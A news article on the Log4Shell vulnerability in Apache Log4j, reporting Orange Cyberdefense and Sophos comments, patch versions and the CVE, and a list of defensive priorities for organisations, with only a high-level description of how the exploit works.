Biggest security threat on the Internet in ten years

The Remote Code Execution (RCE) vulnerability detected in Apache’s Log4j could be the most severe vulnerability in the last decade, according to Orange Cyberdefense.

“Our analysts have noted that this may be the most serious vulnerability we’ve faced in the last decade and, possibly, in the history of modern cyber security,” the company stated.

Dubbed Log4Shell, the Log4j exploit was initially detected on 9 December 2021, but Orange Cyberdefense suspects that attackers may have used it before that date.

“We believe that attackers have been aggressively targeting this vulnerability since 1 December 2021 and possibly before that too,” it said.

“All organisations should anticipate that the vulnerability will be exploited in more sophisticated, targeted attacks in the near future.”

After identifying the exploit, open-source developers promptly released a patch to fix the vulnerability.

However, the fix itself was then discovered to have vulnerabilities, which allowed attackers to execute denial-of-service attacks, making it easy to take vulnerable services offline until they reboot their servers.

It was later discovered that one of the patch’s vulnerabilities — traced as CVE-2021-45046 — allowed for the exfiltration of sensitive data in certain circumstances.

Researchers encourage users to update to version 2.16.0, saying that the initial fix (version 2.15.0) “was incomplete in certain non-default configurations”.

Orange Cyberdefense explained that users urgently need to locate and upgrade all instances of Log4j to this latest version to mitigate the threat. It said organisations should consider the following priorities:

1. Focus on the Internet and mitigate. Your first step should be to identify Internet-facing attack surfaces that might provide a path to a vulnerable system.
2. Limit outbound internet connections.
3. Communicate with your vendors. Several of the systems you own or use will be vulnerable. Your priority is to inventory your estate and establish a channel to your vendors.
4. Patch Log4j everywhere. Remember that this issue is independent of the version of Java you are running. Upgrading to the latest Java version is recommended, but this will not address the Log4j vulnerability.
5. Detect attacks and limit the impact.
6. Defence in depth. This means patching everything we can, deploying endpoint protection, enforcing strong authentication and limiting user privileges, limiting traffic in, out, and across your network, and searching for abnormal behaviours.

They also said the new patch “fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default”.

IT security company Sophos reported a substantial increase in attacks exploiting the Apache Log4j vulnerability on 12 December 2021.

The company determined that crypto mining botnets were some of the first to exploit the vulnerability, attributing this to the fact that they focus on vulnerable Linux server platforms.

Vulnerable organisations included Apple, Amazon, Tesla, Minecraft, and Google.

Sophos senior threat researcher Sean Gallagher said that the Log4j vulnerability presents a new challenge for cybersecurity companies.

“Many software vulnerabilities are limited to a specific product or platform, such as the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange. Once defenders know what software is vulnerable, they can check for and patch it.”

“However, Log4Shell is a library that is used by many products. It can therefore be present in the darkest corners of an organisation’s infrastructure, for example any software developed in-house. Finding all systems that are vulnerable because of Log4Shell should be a priority for IT security,” he added.

Log4j interprets a log message as a URL, will go and fetch it, and even execute any executable payload it contains with the full privileges of the main program.

Exploits are triggered inside text using the ${} syntax and allowing them to be included in browser user agents or other commonly-logged attributes.

Now read: Standard Bank property tool exposed home owners’ personal data